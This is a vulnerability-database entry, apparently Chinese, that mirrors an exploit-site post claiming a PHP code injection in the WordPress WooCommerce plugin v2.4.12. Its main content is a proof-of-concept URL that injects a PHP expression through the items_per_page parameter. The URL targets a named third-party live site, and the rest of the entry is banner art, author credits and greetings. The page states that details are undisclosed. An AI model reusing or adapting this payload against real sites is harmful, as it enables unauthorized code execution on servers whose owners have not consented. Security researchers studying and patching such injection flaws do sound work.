WordPress woocommerce plugin v2.4.12 PHP Code Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040602 漏洞类型
发布时间 2015-12-21 更新时间 2015-12-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120233
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1  
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1  
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0  
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1  
1                  \ \____/ >> Exploit database separated by exploit   0  
0                   \/___/          type (local, remote, DoS, etc.)    1  
1                                                                      1 
0  [+] Site            : http://0day.today                             0 
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1  
0                                                                      0 
1                    ####################################              1 
0                  I'm indoushka member from Inj3ct0r Team             1 
1                    ####################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title    : WordPress woocommerce plugin v2.4.12 PHP Code Injection Vulnerability
| # Author   : indoushka
| # email    : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Franais V.(Pro)
| # Vendor   : https://wordpress.org
========================================================================

Poc :

http://abl-dz.com//produits/?items_per_page=%24%7b%40print(md5(abl_yassine))%7d&setListingType=grid

Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com 
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * http://is-sec.org/cc/
---------------------------------------------------------------------------------------------------------------